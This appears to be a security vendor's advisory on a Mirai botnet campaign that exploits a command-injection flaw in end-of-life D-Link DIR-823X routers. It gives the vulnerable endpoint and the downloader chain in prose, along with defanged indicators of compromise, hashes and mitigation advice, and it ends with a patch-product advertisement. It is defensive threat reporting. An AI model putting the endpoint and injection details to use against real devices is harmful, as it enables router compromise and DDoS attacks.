Researchers have uncovered an active Mirai botnet campaign exploiting CVE-2025-29635, a command-injection vulnerability in legacy D-Link DIR-823X routers, to recruit internet-exposed devices into a distributed denial-of-service (DDoS) botnet. Attackers deploy a Mirai malware variant known as “tuxnokill,” which establishes command-and-control (C2) communication, spreads to additional vulnerable IoT devices, and prepares infected systems for large-scale DDoS operations.
The objective of this campaign is simple but highly damaging: compromise unsupported D-Link routers at scale, weaponize them as Mirai botnet nodes, and leverage that infrastructure for DDoS attacks and further botnet propagation across connected networks.
Vulnerability & Affected Products
The campaign centers specifically around CVE-2025-29635:
| CVE ID | CVE-2025-29635 |
|---|---|
| Vulnerability Type | OS Command Injection (CWE-77) |
| CVSS Score | 7.2 (High) |
| EPSS Score | 58.94% |
| Affected Products | D-Link DIR-823X routers |
| Affected Firmware | Versions 240126 and 240802 |
| Vulnerable Endpoint | POST /goform/set_prohibiting |
| Root Cause | Unsanitized user input passed into system() via snprintf() |
| Fixed Version | No official patch available |
| Role in Campaign | Primary initial access vector |
Attack Methodology: CVE-2025-29635 Exploitation Chain
Exploitation of CVE-2025-29635 is fully automated and requires no user interaction. Any internet-exposed vulnerable D-Link DIR-823X router can be remotely compromised.
Initial Exploitation: Attackers send a specially crafted POST request to the /goform/set_prohibiting endpoint of the router. The vulnerability exists because attacker-controlled input is copied into a command string using snprintf() and later executed using the system() function without proper sanitization or validation. This allows attackers to inject shell metacharacters and execute arbitrary operating system commands directly on the device.
Downloader Delivery: After successful command injection, the attacker downloads a shell script named dlink.sh. The downloader infrastructure was observed hosted at 88.214.20[.]14. Multiple fallback methods such as busybox wget, curl, wget, tftp, and ftpget are used to ensure payload delivery even if some utilities are unavailable on the target device.
Payload Deployment: The dlink.sh script downloads and executes the Mirai malware payload named tuxnokill. The malware is compiled for multiple CPU architectures including ARM, MIPS, x86, and x86_64, enabling infection across diverse embedded Linux environments. This allows broad-scale compromise of heterogeneous IoT and networking devices.
Configuration Unpacking: Once executed, the malware decodes its embedded configuration using XOR Key: 0x30.
MITRE ATT&CK: Tactics and Techniques
| ID | Tactic | Technique | Description |
|---|---|---|---|
| TA0001 | Initial Access | T1190 – Exploit Public-Facing Application | Exploiting CVE-2025-29635 via crafted POST requests |
| TA0002 | Execution | T1059.004 – Unix Shell | Injected shell commands execute directly through system() |
| TA0003 | Persistence | T1105 – Ingress Tool Transfer | Delivery of downloader and Mirai payload |
| TA0005 | Defense Evasion | T1027 – Obfuscated Files or Information | XOR encoding hides malware configuration |
| TA0011 | Command and Control | T1071 – Application Layer Protocol | Communication with external C2 server |
| TA0040 | Impact | T1498 – Network Denial of Service | Mirai DDoS flooding operations |
Indicators of Compromise (IOCs)
The following artifacts were identified during analysis of the CVE-2025-29635 campaign:
| Type | Indicator |
|---|---|
| Downloader IP | 88.214.20[.]14 |
| C2 Server | 64.89.161[.]130:44300 |
| Malware Name | tuxnokill |
| Download Script | dlink.sh |
| Vulnerable Endpoint | POST /goform/set_prohibiting |
| Common Execution Paths | /tmp, /var/run, /mnt, /root, / |
| XOR Encoding Key | 0x30 |
| Hardcoded String | AI.NEEDS.TO.DIE |
SHA256 Hashes
- 72eff03b8573329818b38185074aa763e99d15f5709fecc44f9afece21dc06d8
- 32ca4b70e84787144574bfdb85a0092f3ebf524bb78febdd28d4c832b53fe100
- be902e86ec68515e23a3387a21e80d098d258223ce562598c27ee6d89b83ff2b
- d232c0960f24ba4bb369821b1bf2836d9e576a34fa3ddca2618c80b2f54277f7
- 7792f5c1d5c6c6415732ba0f63328549e19cc9c182c258c17b97b77fdb5541b8
Visual Attack Flow
[Attacker Sends Crafted POST to /goform/set_prohibiting]
-> [CVE-2025-29635 Command Injection Executes via system()]
-> [Shell Script dlink.sh Downloaded from 88.214.20[.]14]
-> [Mirai Payload “tuxnokill” Downloaded and Executed]
-> [XOR-Decoded Configuration Loaded: C2 + Attack Modules]
-> [Router Connects to C2 at 64.89.161[.]130:44300]
-> [Mirai Botnet Receives DDoS Commands]
-> [Compromised Router Participates in Large-Scale DDoS Attacks]
Key Takeaways & Mitigation
- Replace End-of-Life Devices Immediately: Since D-Link DIR-823X routers reached end-of-life in September 2025, no vendor patch is expected. Full device replacement is the safest and strongest mitigation.
- Remove Direct Internet Exposure: If replacement cannot happen immediately, remove the router from direct internet exposure using firewalls, VPN-only access, NAT restrictions, and internal network segmentation.
- Monitor for Outbound Connections: Alert on outbound traffic to
88.214.20[.]14and64.89.161[.]130, especially from devices that should not normally initiate external communications. - Inspect for Unexpected Shell Activity: Watch for shell script downloads such as
dlink.sh, repeatedwget,curl,tftp, orftpgetattempts, and binaries executed from directories like/tmpor/var/run, as these are strong indicators of compromise. - Segment IoT and Networking Devices: Place routers, cameras, DVRs, and embedded devices on isolated VLANs to prevent lateral movement into critical internal assets.
- Block Mirai-Like Traffic Patterns: Monitor for unusual outbound network flood behavior that may indicate the device is participating in Mirai-driven DDoS attacks.
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.